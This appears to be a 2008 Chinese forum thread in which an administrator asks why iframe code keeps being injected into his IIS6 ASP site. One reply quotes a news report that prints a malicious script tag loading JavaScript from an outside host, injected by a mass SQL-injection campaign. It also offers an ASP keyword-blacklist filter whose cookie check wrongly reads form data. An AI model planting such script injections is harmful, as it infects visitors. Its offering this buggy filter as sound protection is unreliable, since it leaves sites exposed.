9,506
社区成员
发帖
与我相关
我的任务
分享求教:高手进来看看这样的情况是受到什么攻击??
服务器是win2003,IIS6,运行一个asp网站,近来网站的文件老是被修改了,插入代码:
<iframe xxxxxx></iframe>
磁盘和目录都做了权限配置,把不让用户写入的都禁止了,但还是被修改了,把21端口关掉也一样被改,
刚开始还好,可以按修改时间来搜索哪些文件被改,后来发现被修改后,文件的修改时间也被改了!!!
后来干脆把文件都设为"只读",文件内容还是被改了,文件的"只读"属性也被改掉了!!!!
1个目录6多个文件花了一两秒就被修改了.
后来把一些运行常见木马的的组件禁用掉:
C:\Documents and Settings\Administrator>regsvr32 /u %windir%\system32\WSHom.Ocx
C:\Documents and Settings\Administrator>regsvr32.exe /u %windir%\system32\scrrun.dll
C:\Documents and Settings\Administrator>regsvr32 /s /u "C:\Program Files\CommonFiles\System\ado\msado15.dll"
还是无济于事!!
高手们,这是什么类型的攻击?好像不是asp木马?已经一个多星期了,拜托大家了,谢谢!
<iframe xxxxxx></iframe>
磁盘和目录都做了权限配置,把不让用户写入的都禁止了,但还是被修改了,把21端口关掉也一样被改,
刚开始还好,可以按修改时间来搜索哪些文件被改,后来发现被修改后,文件的修改时间也被改了!!!
后来干脆把文件都设为"只读",文件内容还是被改了,文件的"只读"属性也被改掉了!!!!
1个目录6多个文件花了一两秒就被修改了.
后来把一些运行常见木马的的组件禁用掉:
C:\Documents and Settings\Administrator>regsvr32 /u %windir%\system32\WSHom.Ocx
C:\Documents and Settings\Administrator>regsvr32.exe /u %windir%\system32\scrrun.dll
C:\Documents and Settings\Administrator>regsvr32 /s /u "C:\Program Files\CommonFiles\System\ado\msado15.dll"
还是无济于事!!
高手们,这是什么类型的攻击?好像不是asp木马?已经一个多星期了,拜托大家了,谢谢!
...全文
请发表友善的回复…
发表回复
lijiadeniu 2008-08-21
- 打赏
- 举报
回帖是一种美德!
corpse009 2008-06-28
- 打赏
- 举报
总的来说还是安全不到位
你是否查看了服务器管理员权限有没有被入侵者拿下。
如果他有与你同样的管理员权限那么你什么做安全都是空的。
还有看是不是服务器被安装有后门程序。
ASP的只要你权限设置得死几本上不怕什么注入
我的站是ASP的,权限设置到每一个文件与文件夹上,把一些webshell用来提权的组件与服务全做了安全。
然后把没用的端口全部屏蔽。
你是否查看了服务器管理员权限有没有被入侵者拿下。
如果他有与你同样的管理员权限那么你什么做安全都是空的。
还有看是不是服务器被安装有后门程序。
ASP的只要你权限设置得死几本上不怕什么注入
我的站是ASP的,权限设置到每一个文件与文件夹上,把一些webshell用来提权的组件与服务全做了安全。
然后把没用的端口全部屏蔽。
空心兜兜 2008-06-28
- 打赏
- 举报
关注下=.=
pcvc 2008-06-27
- 打赏
- 举报
自己顶下
pcvc 2008-06-27
- 打赏
- 举报
怎么看?? 系统管理员密码都改过好几回了.
chensijian 2008-06-27
- 打赏
- 举报
LZ你看一下是否你的管理员用户权限暴露了。
arthaslsm 2008-06-27
- 打赏
- 举报
偶还没遇到过这种现象,最好永远也别遇到!!!
pcvc 2008-06-27
- 打赏
- 举报
楼上说的我也被整过, 解决了, 现在改的是文件!!!
viva2005bing 2008-06-27
- 打赏
- 举报
看来这里的文章
据IDG新闻服务5月19日报道,中国大陆和中国台湾地区数以千计的网站正在遭受大规模的SQL注入攻击。由于采用了非常强的SQL注入攻击手段,因此将会给很多目标网站带来不可逆转的破坏,数以千计的网站被卷入到了这次攻击中,截止上周五已经有超过1万个服务器被植入了恶意代码,而其中的大部分都位于中国大陆,还有一少部分位于中国台湾地区。搜房网和深圳汽车大世界网都沦为了上周五的攻击目标。
受到攻击的服务器数据库表中所有字符字段都被加入“"></"></title><script src=http://s.see9.us/s.js></script><!--“通过查询和参考相关材料,用asp语言整理出以下代码可以解决上述问题(其他语言可以按其原理重新编写),这段代码有三个特点:
1.用lcase防范大写的sql注入代码
2,分别防范来自Request.QueryString,Request.Form,Request.cookies三个方面的危险
3。直接将代码拷进数据库链接文件,例如asp语言的可以添加到conn文件中。
防范代码如下:(希望更多高手提出意见)
SQL_injdata = "'|exec|insert|select|delete|update|count|iframe|script|chr|mid|master|truncate|char|declare|*|%|and"
SQL_inj = split(SQL_Injdata,"|")
'QueryString请求的注入的拦截
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
Next
End If
'Get请求的注入的拦截
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
'cookies请求的注入的拦截
If Request.cookies<>"" Then
For Each Sql_Post1 In Request.cookies
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post1)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
最好把你网站的注入点找出来,然后做好防注入工作,这个是比较关键所在.
据IDG新闻服务5月19日报道,中国大陆和中国台湾地区数以千计的网站正在遭受大规模的SQL注入攻击。由于采用了非常强的SQL注入攻击手段,因此将会给很多目标网站带来不可逆转的破坏,数以千计的网站被卷入到了这次攻击中,截止上周五已经有超过1万个服务器被植入了恶意代码,而其中的大部分都位于中国大陆,还有一少部分位于中国台湾地区。搜房网和深圳汽车大世界网都沦为了上周五的攻击目标。
受到攻击的服务器数据库表中所有字符字段都被加入“"></"></title><script src=http://s.see9.us/s.js></script><!--“通过查询和参考相关材料,用asp语言整理出以下代码可以解决上述问题(其他语言可以按其原理重新编写),这段代码有三个特点:
1.用lcase防范大写的sql注入代码
2,分别防范来自Request.QueryString,Request.Form,Request.cookies三个方面的危险
3。直接将代码拷进数据库链接文件,例如asp语言的可以添加到conn文件中。
防范代码如下:(希望更多高手提出意见)
SQL_injdata = "'|exec|insert|select|delete|update|count|iframe|script|chr|mid|master|truncate|char|declare|*|%|and"
SQL_inj = split(SQL_Injdata,"|")
'QueryString请求的注入的拦截
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
Next
End If
'Get请求的注入的拦截
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
'cookies请求的注入的拦截
If Request.cookies<>"" Then
For Each Sql_Post1 In Request.cookies
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post1)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if
最好把你网站的注入点找出来,然后做好防注入工作,这个是比较关键所在.
